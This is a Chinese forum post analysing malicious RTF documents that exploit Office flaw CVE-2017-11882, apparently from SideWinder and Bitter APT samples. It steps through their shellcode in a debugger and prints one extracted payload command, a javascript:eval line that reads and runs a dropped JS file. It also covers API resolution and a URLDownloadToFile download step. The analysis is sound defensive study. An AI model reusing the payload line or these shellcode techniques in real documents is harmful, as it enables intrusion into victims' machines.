首页
社区
课程
招聘
[分享]Office漏洞分析丨CVE-2017-11882及利用样本分析(下篇)
发表于: 2020-4-17 11:19 4814

[分享]Office漏洞分析丨CVE-2017-11882及利用样本分析(下篇)

2020-4-17 11:19
4814

今天的文章是 i 春秋论坛作者ERFZE表哥发布的文章,关于CVE-2017-11882及利用样本分析,由于文章篇幅较长,我们分了上、下两篇,错过上篇的童鞋可以点击下方链接进行学习哦~


Office漏洞丨CVE-2017-11882及利用样本分析(上篇)


在上篇内容中,我们分享了Office漏洞的成因、影响版本及摩诃草(APT-C-09)组织某样本分析,今天我们继续分享响尾蛇(SideWinder)组织某样本分析和蔓灵花(Bitter)组织某样本分析,快来学习吧~


响尾蛇(SideWinder)组织某样本分析

将文档拖进WinHex查看:

可以看出该文档实质是一RTF格式文档。

用rtfobj.py分析如下:

Package后文会提到,先来看其CVE-2017-11882利用部分。

同样是第二次断下时:

其后的执行流程与上一样本相似:

经过绿色方框中的一系列运算后,调用GlobalLock( )函数,传递参数如下:

接下来跳转到GlobalLock( )函数返回内存区域中:

经过两次call调用:

修正内存中的字符串:

接下来寻址kernel32.dll:

其所调用的函数功能如下:

两次call调用之后:

其功能为返回某函数调用地址,此次是LoadLibrayW( ):

接下来,返回GetProcAddress( )调用地址:

继续call调用:

其后流程如图所示:

下面将字符串解密,并覆盖原CommandLine内容:

执行完结果如下:

最后实际执行部分:

javascript:eval("sa=ActiveXObject;ab=new sa(\"Scripting.FileSystemObject\");
eval(ab.OpenTextFile(ab.GetSpecialFolder(2)+\"\\\\1.a\",1).ReadAll());windowclose()")

其后调用RunHTMLApplication( ):

1.a就是之前提到RTF文档中的Package,其实质是一JS文件:

最后,其执行结果大体如下图所示:

蔓灵花(Bitter)组织某样本分析

通过远程模板注入的方式下载一RTF格式文档:

拖进WinHex查看,可以确认其格式为RTF文档格式:

添加文件扩展名后,打开该文档。同样是于0x411658处第二次断下时:

跳转之后经过绿色方框中一系列计算,接着跳转:

fldpi将π的值加载到FPU堆栈:

执行完后fpu_instruction_pointer指向fldpi指令,其后的fnstenv指令将FpuSaveState结构体保存到esp-0xC处:

如此一来,pop ebp后EBP寄存器的值是fpu_instruction_pointer——fldpi指令位置:

由EBP计算出需要解密的数据起始位置,EDX中存储的是数据长度(0x315):

接着执行解密后的指令:

跳转后,执行相应指令,接下来call调用:

sub_562B2F功能是获取指定的系统函数调用地址,此次是kernel32.VirtualAlloc( ):

之后调用VirtualAlloc( )申请内存空间:

向申请的内存空间中写入数据:

调用sub_562B2F获取kernel32.Wow64DisableWow64FsRedirection( )调用地址:

LoadLibrary(shell32):

传递参数给sub_562B2F,获取shell32.ShellExcute( )调用地址:

LoadLibrary(urlmon)

获取urlmon.URLDownloadToFile( )调用地址:

调用URLDownloadToFile( ),其传递参数如图:

读取文件:

由于没有获取到文件,计算出的EBX值错误:

故至此结束。


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//